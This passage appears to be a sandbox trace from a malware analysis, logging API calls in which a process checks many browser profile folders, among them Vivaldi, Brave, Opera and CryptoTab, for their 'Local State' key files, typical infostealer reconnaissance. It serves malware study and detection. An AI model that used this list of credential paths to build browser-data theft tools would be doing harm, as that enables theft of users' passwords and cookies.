(lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\local state")) returned 0xffffffff [0234.557] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*") returned 68 [0234.557] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.559] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.559] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0234.559] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" [0234.561] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" [0234.561] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\local state")) returned 0xffffffff [0234.561] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*") returned 55 [0234.561] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.563] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.563] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0234.563] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" [0234.563] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" [0234.563] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\local state")) returned 0xffffffff [0234.564] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*") returned 62 [0234.564] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.565] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.565] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0234.565] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" [0234.566] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" [0234.566] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\local state")) returned 0xffffffff [0234.566] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*") returned 62 [0234.566] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.567] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.568] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0234.568] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" [0234.568] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" [0234.569] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\local state")) returned 0xffffffff [0234.570] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*") returned 56 [0234.570] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.571] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.572] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0234.572] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" [0234.572] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" [0234.572] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\local state")) returned 0xffffffff [0234.572] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*") returned 59 [0234.572] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x5c0061, ftCreationTime.dwLowDateTime=0x6f004c, ftCreationTime.dwHighDateTime=0x610063, ftLastAccessTime.dwLowDateTime=0x20006c, ftLastAccessTime.dwHighDateTime=0x740053, ftLastWriteTime.dwLowDateTime=0x740061, ftLastWriteTime.dwHighDateTime=0x65, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.574] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.574] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0234.574] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" [0234.574] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" [0234.574] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\local state")) returned 0xffffffff [0234.574] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*") returned 64 [0234.574] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.576] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.577] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0234.577] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile" [0234.577] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" [0234.577] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torbro\\profile\\local state")) returned 0xffffffff [0234.577] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*") returned 52 [0234.577] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x530020, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x650074, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.579] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.579] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0234.579] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data" [0234.579] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" [0234.580] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\local state")) returned 0xffffffff [0234.580] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*") returned 65 [0234.580] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x720065, ftCreationTime.dwLowDateTime=0x440020, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x5c0061, ftLastAccessTime.dwHighDateTime=0x6f004c, ftLastWriteTime.dwLowDateTime=0x610063, ftLastWriteTime.dwHighDateTime=0x20006c, nFileSizeHigh=0x740053, nFileSizeLow=0x740061, dwReserved0=0x65, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.581] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.582] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0234.582] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" [0234.582] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" [0234.582] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\local state")) returned 0xffffffff [0234.582] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*") returned 75 [0234.582] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x720042, ftCreationTime.dwLowDateTime=0x77006f, ftCreationTime.dwHighDateTime=0x650073, ftLastAccessTime.dwLowDateTime=0x5c0072, ftLastAccessTime.dwHighDateTime=0x730055, ftLastWriteTime.dwLowDateTime=0x720065, ftLastWriteTime.dwHighDateTime=0x440020, nFileSizeHigh=0x740061, nFileSizeLow=0x5c0061, dwReserved0=0x6f004c, dwReserved1=0x610063, cFileName="l", cAlternateFileName="n\x01")) returned 0xffffffff [0234.584] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.585] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0234.585] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\" [0234.585] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" [0234.585] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera stable\\local state")) returned 0xffffffff [0234.586] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*") returned 68 [0234.586] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610072, ftCreationTime.dwLowDateTime=0x530020, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x6c0062, ftLastAccessTime.dwHighDateTime=0x5c0065, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.586] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0234.586] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0234.586] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\" [0234.586] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" [0234.586] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\opera gx stable\\local state")) returned 0xffffffff [0234.587] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*") returned 71 [0234.587] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x610072, ftCreationTime.dwLowDateTime=0x470020, ftCreationTime.dwHighDateTime=0x200058, ftLastAccessTime.dwLowDateTime=0x740053, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x65006c, ftLastWriteTime.dwHighDateTime=0x4c005c, nFileSizeHigh=0x63006f, nFileSizeLow=0x6c0061, dwReserved0=0x530020, dwReserved1=0x610074, cFileName="t", cAlternateFileName="n\x01")) returned 0xffffffff [0234.587] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.587] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0234.587] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data" [0234.587] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" [0234.587] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\opera software\\opera neon\\user data\\local state")) returned 0xffffffff [0234.587] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*") returned 73 [0234.588] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Opera Software\\Opera Neon\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x4e0020, 